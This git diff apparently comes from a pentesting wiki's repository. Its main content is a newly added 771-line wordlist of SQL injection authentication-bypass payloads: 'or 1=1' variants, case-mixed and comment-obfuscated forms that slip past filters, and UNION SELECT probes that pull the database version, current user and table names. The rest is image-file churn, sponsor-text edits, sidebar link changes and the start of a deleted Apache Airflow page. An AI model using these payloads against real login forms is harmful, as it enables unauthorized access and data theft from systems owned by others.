a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (7).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (7).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (7).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (9).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (9).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (9).png differ diff --git a/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png new file mode 100644 index 000000000..4e69d4e12 Binary files /dev/null and b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png differ diff --git a/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (2).png b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (2).png new file mode 100644 index 000000000..4e69d4e12 Binary files /dev/null and b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (2).png differ diff --git a/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt new file mode 100644 index 000000000..5a03da57f --- /dev/null +++ b/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt @@ -0,0 +1,771 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 +== += +' +' -- +' # +' – +'-- +'/* +'# +" -- +" # +"/* +' and 1='1 +' and a='a + or 1=1 + or true +' or ''=' +" or ""=" +1β€²) and '1β€²='1– +' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 +" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 + and 1=1 + and 1=1– +' and 'one'='one +' and 'one'='one– +' group by password having 1=1-- +' group by userid having 1=1-- +' group by username having 1=1-- + like '%' + or 0=0 -- + or 0=0 # + or 0=0 – +' or 0=0 # +' or 0=0 -- +' or 0=0 # +' or 0=0 – +" or 0=0 -- +" or 0=0 # +" or 0=0 – +%' or '0'='0 + or 1=1 + or 1=1-- + or 1=1/* + or 1=1# + or 1=1– +' or 1=1-- +' or '1'='1 +' or '1'='1'-- +' or '1'='1'/* +' or '1'='1'# +' or '1β€²='1 +' or 1=1 +' or 1=1 -- +' or 1=1 – +' or 1=1-- +' or 1=1;# +' or 1=1/* +' or 1=1# +' or 1=1– +') or '1'='1 +') or '1'='1-- +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1'# +') or ('1'='1 +') or ('1'='1-- +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1'# +'or'1=1 +'or'1=1β€² +" or "1"="1 +" or "1"="1"-- +" or "1"="1"/* +" or "1"="1"# +" or 1=1 +" or 1=1 -- +" or 1=1 – +" or 1=1-- +" or 1=1/* +" or 1=1# +" or 1=1– +") or "1"="1 +") or "1"="1"-- +") or "1"="1"/* +") or "1"="1"# +") or ("1"="1 +") or ("1"="1"-- +") or ("1"="1"/* +") or ("1"="1"# +) or '1β€²='1– +) or ('1β€²='1– +' or 1=1 LIMIT 1;# +'or 1=1 or ''=' +"or 1=1 or ""=" +' or 'a'='a +' or a=a-- +' or a=a– +') or ('a'='a +" or "a"="a +") or ("a"="a +') or ('a'='a and hi") or ("a"="a +' or 'one'='one +' or 'one'='one– +' or uid like '% +' or uname like '% +' or userid like '% +' or user like '% +' or username like '% +' or 'x'='x +') or ('x'='x +" or "x"="x +' OR 'x'='x'#; +'=' 'or' and '=' 'or' +' UNION ALL SELECT 1, @@version;# +' UNION ALL SELECT system_user(),user();# +' UNION select table_schema,table_name FROM information_Schema.tables;# +admin' and substring(password/text(),1,1)='7 +' and substring(password/text(),1,1)='7 + +== += +' +" +'-- 2 +'/* +'# +"-- 2 +" # +"/* +'-' +'&' +'^' +'*' +'=' +0'<'2 +"-" +"&" +"^" +"*" +"=" +0"<"2 + +') +") +')-- 2 +')/* +')# +")-- 2 +") # +")/* +')-(' +')&(' +')^(' +')*(' +')=(' +0')<('2 +")-(" +")&(" +")^(" +")*(" +")=(" +0")<("2 + +'-''-- 2 +'-''# +'-''/* +'&''-- 2 +'&''# +'&''/* +'^''-- 2 +'^''# +'^''/* +'*''-- 2 +'*''# +'*''/* +'=''-- 2 +'=''# +'=''/* +0'<'2'-- 2 +0'<'2'# +0'<'2'/* +"-""-- 2 +"-""# +"-""/* +"&""-- 2 +"&""# +"&""/* +"^""-- 2 +"^""# +"^""/* +"*""-- 2 +"*""# +"*""/* +"=""-- 2 +"=""# +"=""/* +0"<"2"-- 2 +0"<"2"# +0"<"2"/* + +')-''-- 2 +')-''# +')-''/* +')&''-- 2 +')&''# +')&''/* +')^''-- 2 +')^''# +')^''/* +')*''-- 2 +')*''# +')*''/* +')=''-- 2 +')=''# +')=''/* +0')<'2'-- 2 +0')<'2'# +0')<'2'/* +")-""-- 2 +")-""# +")-""/* +")&""-- 2 +")&""# +")&""/* +")^""-- 2 +")^""# +")^""/* +")*""-- 2 +")*""# +")*""/* +")=""-- 2 +")=""# +")=""/* +0")<"2-- 2 +0")<"2# +0")<"2/* + + +'oR'2 +'oR'2'-- 2 +'oR'2'# +'oR'2'/* +'oR'2'oR' +'oR(2)-- 2 +'oR(2)# +'oR(2)/* +'oR(2)oR' +'oR 2-- 2 +'oR 2# +'oR 2/* +'oR 2 oR' +'oR/**/2-- 2 +'oR/**/2# +'oR/**/2/* +'oR/**/2/**/oR' +"oR"2 +"oR"2"-- 2 +"oR"2"# +"oR"2"/* +"oR"2"oR" +"oR(2)-- 2 +"oR(2)# +"oR(2)/* +"oR(2)oR" +"oR 2-- 2 +"oR 2# +"oR 2/* +"oR 2 oR" +"oR/**/2-- 2 +"oR/**/2# +"oR/**/2/* +"oR/**/2/**/oR" + +'oR'2'='2 +'oR'2'='2'oR' +'oR'2'='2'-- 2 +'oR'2'='2'# +'oR'2'='2'/* +'oR'2'='2'oR' +'oR 2=2-- 2 +'oR 2=2# +'oR 2=2/* +'oR 2=2 oR' +'oR/**/2=2-- 2 +'oR/**/2=2# +'oR/**/2=2/* +'oR/**/2=2/**/oR' +'oR(2)=2-- 2 +'oR(2)=2# +'oR(2)=2/* +'oR(2)=2/* +'oR(2)=(2)oR' +'oR'2'='2' LimIT 1-- 2 +'oR'2'='2' LimIT 1# +'oR'2'='2' LimIT 1/* +'oR(2)=(2)LimIT(1)-- 2 +'oR(2)=(2)LimIT(1)# +'oR(2)=(2)LimIT(1)/* +"oR"2"="2 +"oR"2"="2"oR" +"oR"2"="2"-- 2 +"oR"2"="2"# +"oR"2"="2"/* +"oR"2"="2"oR" +"oR 2=2-- 2 +"oR 2=2# +"oR 2=2/* +"oR 2=2 oR" +"oR/**/2=2-- 2 +"oR/**/2=2# +"oR/**/2=2/* +"oR/**/2=2/**/oR" +"oR(2)=2-- 2 +"oR(2)=2# +"oR(2)=2/* +"oR(2)=2/* +"oR(2)=(2)oR" +"oR"2"="2" LimIT 1-- 2 +"oR"2"="2" LimIT 1# +"oR"2"="2" LimIT 1/* +"oR(2)=(2)LimIT(1)-- 2 +"oR(2)=(2)LimIT(1)# +"oR(2)=(2)LimIT(1)/* + +'oR true-- 2 +'oR true# +'oR true/* +'oR true oR' +'oR(true)-- 2 +'oR(true)# +'oR(true)/* +'oR(true)oR' +'oR/**/true-- 2 +'oR/**/true# +'oR/**/true/* +'oR/**/true/**/oR' +"oR true-- 2 +"oR true# +"oR true/* +"oR true oR" +"oR(true)-- 2 +"oR(true)# +"oR(true)/* +"oR(true)oR" +"oR/**/true-- 2 +"oR/**/true# +"oR/**/true/* +"oR/**/true/**/oR" + +'oR'2'LiKE'2 +'oR'2'LiKE'2'-- 2 +'oR'2'LiKE'2'# +'oR'2'LiKE'2'/* +'oR'2'LiKE'2'oR' +'oR(2)LiKE(2)-- 2 +'oR(2)LiKE(2)# +'oR(2)LiKE(2)/* +'oR(2)LiKE(2)oR' +"oR"2"LiKE"2 +"oR"2"LiKE"2"-- 2 +"oR"2"LiKE"2"# +"oR"2"LiKE"2"/* +"oR"2"LiKE"2"oR" +"oR(2)LiKE(2)-- 2 +"oR(2)LiKE(2)# +"oR(2)LiKE(2)/* +"oR(2)LiKE(2)oR" + +admin +admin'-- 2 +admin'# +admin'/* +admin"-- 2 +admin"# +ffifdyop + +' UniON SElecT 1,2-- 2 +' UniON SElecT 1,2,3-- 2 +' UniON SElecT 1,2,3,4-- 2 +' UniON SElecT 1,2,3,4,5-- 2 +' UniON SElecT 1,2# +' UniON SElecT 1,2,3# +' UniON SElecT 1,2,3,4# +' UniON SElecT 1,2,3,4,5# +'UniON(SElecT(1),2)-- 2 +'UniON(SElecT(1),2,3)-- 2 +'UniON(SElecT(1),2,3,4)-- 2 +'UniON(SElecT(1),2,3,4,5)-- 2 +'UniON(SElecT(1),2)# +'UniON(SElecT(1),2,3)# +'UniON(SElecT(1),2,3,4)# +'UniON(SElecT(1),2,3,4,5)# +" UniON SElecT 1,2-- 2 +" UniON SElecT 1,2,3-- 2 +" UniON SElecT 1,2,3,4-- 2 +" UniON SElecT 1,2,3,4,5-- 2 +" UniON SElecT 1,2# +" UniON SElecT 1,2,3# +" UniON SElecT 1,2,3,4# +" UniON SElecT 1,2,3,4,5# +"UniON(SElecT(1),2)-- 2 +"UniON(SElecT(1),2,3)-- 2 +"UniON(SElecT(1),2,3,4)-- 2 +"UniON(SElecT(1),2,3,4,5)-- 2 +"UniON(SElecT(1),2)# +"UniON(SElecT(1),2,3)# +"UniON(SElecT(1),2,3,4)# +"UniON(SElecT(1),2,3,4,5)# + +'||'2 +'||2-- 2 +'||'2'||' +'||2# +'||2/* +'||2||' +"||"2 +"||2-- 2 +"||"2"||" +"||2# +"||2/* +"||2||" +'||'2'='2 +'||'2'='2'||' +'||2=2-- 2 +'||2=2# +'||2=2/* +'||2=2||' +"||"2"="2 +"||"2"="2"||" +"||2=2-- 2 +"||2=2# +"||2=2/* +"||2=2||" +'||2=(2)LimIT(1)-- 2 +'||2=(2)LimIT(1)# +'||2=(2)LimIT(1)/* +"||2=(2)LimIT(1)-- 2 +"||2=(2)LimIT(1)# +"||2=(2)LimIT(1)/* +'||true-- 2 +'||true# +'||true/* +'||true||' +"||true-- 2 +"||true# +"||true/* +"||true||" +'||'2'LiKE'2 +'||'2'LiKE'2'-- 2 +'||'2'LiKE'2'# +'||'2'LiKE'2'/* +'||'2'LiKE'2'||' +'||(2)LiKE(2)-- 2 +'||(2)LiKE(2)# +'||(2)LiKE(2)/* +'||(2)LiKE(2)||' +"||"2"LiKE"2 +"||"2"LiKE"2"-- 2 +"||"2"LiKE"2"# +"||"2"LiKE"2"/* +"||"2"LiKE"2"||" +"||(2)LiKE(2)-- 2 +"||(2)LiKE(2)# +"||(2)LiKE(2)/* +"||(2)LiKE(2)||" + +')oR('2 +')oR'2'-- 2 +')oR'2'# +')oR'2'/* +')oR'2'oR(' +')oR(2)-- 2 +')oR(2)# +')oR(2)/* +')oR(2)oR(' +')oR 2-- 2 +')oR 2# +')oR 2/* +')oR 2 oR(' +')oR/**/2-- 2 +')oR/**/2# +')oR/**/2/* +')oR/**/2/**/oR(' +")oR("2 +")oR"2"-- 2 +")oR"2"# +")oR"2"/* +")oR"2"oR(" +")oR(2)-- 2 +")oR(2)# +")oR(2)/* +")oR(2)oR(" +")oR 2-- 2 +")oR 2# +")oR 2/* +")oR 2 oR(" +")oR/**/2-- 2 +")oR/**/2# +")oR/**/2/* +")oR/**/2/**/oR(" +')oR'2'=('2 +')oR'2'='2'oR(' +')oR'2'='2'-- 2 +')oR'2'='2'# +')oR'2'='2'/* +')oR'2'='2'oR(' +')oR 2=2-- 2 +')oR 2=2# +')oR 2=2/* +')oR 2=2 oR(' +')oR/**/2=2-- 2 +')oR/**/2=2# +')oR/**/2=2/* +')oR/**/2=2/**/oR(' +')oR(2)=2-- 2 +')oR(2)=2# +')oR(2)=2/* +')oR(2)=2/* +')oR(2)=(2)oR(' +')oR'2'='2' LimIT 1-- 2 +')oR'2'='2' LimIT 1# +')oR'2'='2' LimIT 1/* +')oR(2)=(2)LimIT(1)-- 2 +')oR(2)=(2)LimIT(1)# +')oR(2)=(2)LimIT(1)/* +")oR"2"=("2 +")oR"2"="2"oR(" +")oR"2"="2"-- 2 +")oR"2"="2"# +")oR"2"="2"/* +")oR"2"="2"oR(" +")oR 2=2-- 2 +")oR 2=2# +")oR 2=2/* +")oR 2=2 oR(" +")oR/**/2=2-- 2 +")oR/**/2=2# +")oR/**/2=2/* +")oR/**/2=2/**/oR(" +")oR(2)=2-- 2 +")oR(2)=2# +")oR(2)=2/* +")oR(2)=2/* +")oR(2)=(2)oR(" +")oR"2"="2" LimIT 1-- 2 +")oR"2"="2" LimIT 1# +")oR"2"="2" LimIT 1/* +")oR(2)=(2)LimIT(1)-- 2 +")oR(2)=(2)LimIT(1)# +")oR(2)=(2)LimIT(1)/* +')oR true-- 2 +')oR true# +')oR true/* +')oR true oR(' +')oR(true)-- 2 +')oR(true)# +')oR(true)/* +')oR(true)oR(' +')oR/**/true-- 2 +')oR/**/true# +')oR/**/true/* +')oR/**/true/**/oR(' +")oR true-- 2 +")oR true# +")oR true/* +")oR true oR(" +")oR(true)-- 2 +")oR(true)# +")oR(true)/* +")oR(true)oR(" +")oR/**/true-- 2 +")oR/**/true# +")oR/**/true/* +")oR/**/true/**/oR(" +')oR'2'LiKE('2 +')oR'2'LiKE'2'-- 2 +')oR'2'LiKE'2'# +')oR'2'LiKE'2'/* +')oR'2'LiKE'2'oR(' +')oR(2)LiKE(2)-- 2 +')oR(2)LiKE(2)# +')oR(2)LiKE(2)/* +')oR(2)LiKE(2)oR(' +")oR"2"LiKE("2 +")oR"2"LiKE"2"-- 2 +")oR"2"LiKE"2"# +")oR"2"LiKE"2"/* +")oR"2"LiKE"2"oR(" +")oR(2)LiKE(2)-- 2 +")oR(2)LiKE(2)# +")oR(2)LiKE(2)/* +")oR(2)LiKE(2)oR(" +admin')-- 2 +admin')# +admin')/* +admin")-- 2 +admin")# +') UniON SElecT 1,2-- 2 +') UniON SElecT 1,2,3-- 2 +') UniON SElecT 1,2,3,4-- 2 +') UniON SElecT 1,2,3,4,5-- 2 +') UniON SElecT 1,2# +') UniON SElecT 1,2,3# +') UniON SElecT 1,2,3,4# +') UniON SElecT 1,2,3,4,5# +')UniON(SElecT(1),2)-- 2 +')UniON(SElecT(1),2,3)-- 2 +')UniON(SElecT(1),2,3,4)-- 2 +')UniON(SElecT(1),2,3,4,5)-- 2 +')UniON(SElecT(1),2)# +')UniON(SElecT(1),2,3)# +')UniON(SElecT(1),2,3,4)# +')UniON(SElecT(1),2,3,4,5)# +") UniON SElecT 1,2-- 2 +") UniON SElecT 1,2,3-- 2 +") UniON SElecT 1,2,3,4-- 2 +") UniON SElecT 1,2,3,4,5-- 2 +") UniON SElecT 1,2# +") UniON SElecT 1,2,3# +") UniON SElecT 1,2,3,4# +") UniON SElecT 1,2,3,4,5# +")UniON(SElecT(1),2)-- 2 +")UniON(SElecT(1),2,3)-- 2 +")UniON(SElecT(1),2,3,4)-- 2 +")UniON(SElecT(1),2,3,4,5)-- 2 +")UniON(SElecT(1),2)# +")UniON(SElecT(1),2,3)# +")UniON(SElecT(1),2,3,4)# +")UniON(SElecT(1),2,3,4,5)# +')||('2 +')||2-- 2 +')||'2'||(' +')||2# +')||2/* +')||2||(' +")||("2 +")||2-- 2 +")||"2"||(" +")||2# +")||2/* +")||2||(" +')||'2'=('2 +')||'2'='2'||(' +')||2=2-- 2 +')||2=2# +')||2=2/* +')||2=2||(' +")||"2"=("2 +")||"2"="2"||(" +")||2=2-- 2 +")||2=2# +")||2=2/* +")||2=2||(" +')||2=(2)LimIT(1)-- 2 +')||2=(2)LimIT(1)# +')||2=(2)LimIT(1)/* +")||2=(2)LimIT(1)-- 2 +")||2=(2)LimIT(1)# +")||2=(2)LimIT(1)/* +')||true-- 2 +')||true# +')||true/* +')||true||(' +")||true-- 2 +")||true# +")||true/* +")||true||(" +')||'2'LiKE('2 +')||'2'LiKE'2'-- 2 +')||'2'LiKE'2'# +')||'2'LiKE'2'/* +')||'2'LiKE'2'||(' +')||(2)LiKE(2)-- 2 +')||(2)LiKE(2)# +')||(2)LiKE(2)/* +')||(2)LiKE(2)||(' +")||"2"LiKE("2 +")||"2"LiKE"2"-- 2 +")||"2"LiKE"2"# +")||"2"LiKE"2"/* +")||"2"LiKE"2"||(" +")||(2)LiKE(2)-- 2 +")||(2)LiKE(2)# +")||(2)LiKE(2)/* +")||(2)LiKE(2)||(" +' UnION SELeCT 1,2` +' UnION SELeCT 1,2,3` +' UnION SELeCT 1,2,3,4` +' UnION SELeCT 1,2,3,4,5` +" UnION SELeCT 1,2` +" UnION SELeCT 1,2,3` +" UnION SELeCT 1,2,3,4` +" UnION SELeCT 1,2,3,4,5` \ No newline at end of file diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 30e9c3cba..b0e4b2d7e 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -22,7 +22,7 @@ dht udp "DHT Nodes" ![](<.gitbook/assets/image (273).png>) -![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).png>) InfluxDB diff --git a/README.md b/README.md index 3f43b7b96..7d59ec5ea 100644 --- a/README.md +++ b/README.md @@ -34,7 +34,7 @@ Here you will find the **typical flow** that **you should follow when pentesting ### [STM Cyber](https://www.stmcyber.com) -![](<.gitbook/assets/image (642) (1) (1) (1).png>) +![](<.gitbook/assets/image (638) (2) (1).png>) [**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentesting, Red teams and training. @@ -72,7 +72,7 @@ Get Access Today:
-[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach. +[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach. WebSec is an **all-in-one security company** which means they do it all; Pentesting, **Security** Audits, Awareness Trainings, Phishing Campagnes, Code Review, Exploit Development, Security Experts Outsourcing and much more. @@ -84,7 +84,7 @@ In addition to the above WebSec is also a **committed supporter of HackTricks.** ### [**INE**](https://ine.com) -![](.gitbook/assets/ine\_logo-3-.jpg) +![](<.gitbook/assets/INE\_Logo (3).jpg>) [**INE**](https://ine.com) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com)**.** diff --git a/SUMMARY.md b/SUMMARY.md index 875c43230..0ed9800a6 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -548,54 +548,9 @@ ## β›ˆ Cloud Security -* [GCP Security](cloud-security/gcp-security/README.md) - * [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md) - * [GCP - Abuse GCP Permissions](cloud-security/gcp-security/gcp-interesting-permissions/README.md) - * [GCP - Privesc to other Principals](cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md) - * [GCP - Privesc to Resources](cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md) - * [GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation](cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md) - * [GCP - Compute Enumeration](cloud-security/gcp-security/gcp-compute-enumeration.md) - * [GCP - Network Enumeration](cloud-security/gcp-security/gcp-network-enumeration.md) - * [GCP - KMS & Secrets Management Enumeration](cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md) - * [GCP - Databases Enumeration](cloud-security/gcp-security/gcp-databases-enumeration.md) - * [GCP - Serverless Code Exec Services Enumeration](cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md) - * [GCP - Buckets Enumeration](cloud-security/gcp-security/gcp-buckets-enumeration.md) - * [GCP - Local Privilege Escalation / SSH Pivoting](cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md) - * [GCP - Persistance](cloud-security/gcp-security/gcp-persistance.md) -* [Workspace Security](cloud-security/workspace-security.md) -* [Github Security](cloud-security/github-security/README.md) - * [Basic Github Information](cloud-security/github-security/basic-github-information.md) -* [Gitea Security](cloud-security/gitea-security/README.md) - * [Basic Gitea Information](cloud-security/gitea-security/basic-gitea-information.md) -* [Kubernetes Security](pentesting/pentesting-kubernetes/README.md) - * [Kubernetes Basics](pentesting/pentesting-kubernetes/kubernetes-basics.md) - * [Pentesting Kubernetes Services](pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md) - * [Exposing Services in Kubernetes](pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md) - * [Attacking Kubernetes from inside a Pod](pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) - * [Kubernetes Enumeration](cloud-security/pentesting-kubernetes/kubernetes-enumeration.md) - * [Kubernetes Role-Based Access Control (RBAC)](pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md) - * [Abusing Roles/ClusterRoles in Kubernetes](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md) - * [K8s Roles Abuse Lab](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md) - * [Pod Escape Privileges](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) - * [Kubernetes Namespace Escalation](cloud-security/pentesting-kubernetes/namespace-escalation.md) - * [Kubernetes Access to other Clouds](cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md) - * [Kubernetes Hardening](pentesting/pentesting-kubernetes/kubernetes-hardening/README.md) - * [Monitoring with Falco](pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md) - * [Kubernetes SecurityContext(s)](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md) - * [Kubernetes NetworkPolicies](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md) - * [Kubernetes Network Attacks](cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md) -* [Concourse](cloud-security/concourse/README.md) - * [Concourse Architecture](cloud-security/concourse/concourse-architecture.md) - * [Concourse Lab Creation](cloud-security/concourse/concourse-lab-creation.md) - * [Concourse Enumeration & Attacks](cloud-security/concourse/concourse-enumeration-and-attacks.md) -* [CircleCI](cloud-security/circleci.md) -* [Jenkins](cloud-security/jenkins.md) -* [Apache Airflow](cloud-security/apache-airflow/README.md) - * [Airflow Configuration](cloud-security/apache-airflow/airflow-configuration.md) - * [Airflow RBAC](cloud-security/apache-airflow/airflow-rbac.md) -* [Atlantis](cloud-security/atlantis.md) -* [Cloud Security Review](cloud-security/cloud-security-review.md) -* [AWS Security](cloud-security/aws-security.md) +* [Pentesting Kubernetes](https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security) +* [Pentesting Cloud (AWS, GCP, Az...)](https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology) +* [Pentesting CI/CD (Github, Jenkins, Terraform...)](https://cloud.hacktricks.xyz/pentesting-ci-cd/pentesting-ci-cd-methodology) ## 😎 Hardware/Physical Access diff --git a/cloud-security/apache-airflow/README.md b/cloud-security/apache-airflow/README.md deleted file mode 100644 index a8e93193d..000000000 --- a/cloud-security/apache-airflow/README.md +++ /dev/null @@ -1,175 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Basic Information - -[**Apache Airflow**](https://airflow.apache.org) is used for the **scheduling and **_**orchestration of data pipelines**_** or workflows**. Orchestration of data pipelines refers to the sequencing, coordination, scheduling, and managing complex **data pipelines from diverse sources**. These data pipelines deliver data sets that are ready for consumption either by business intelligence applications and data science, machine learning models that support big data applications. - -Basically, Apache Airflow will allow you to **schedule de execution of code when something** (event, cron) **happens**. - -# Local Lab - -## Docker-Compose - -You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM). - -## Minikube - -One easy way to **run apache airflo**w is to run it **with minikube**: - -```bash -helm repo add airflow-stable https://airflow-helm.github.io/charts -helm repo update -helm install airflow-release airflow-stable/airflow -# Some information about how to aceess the web console will appear after this 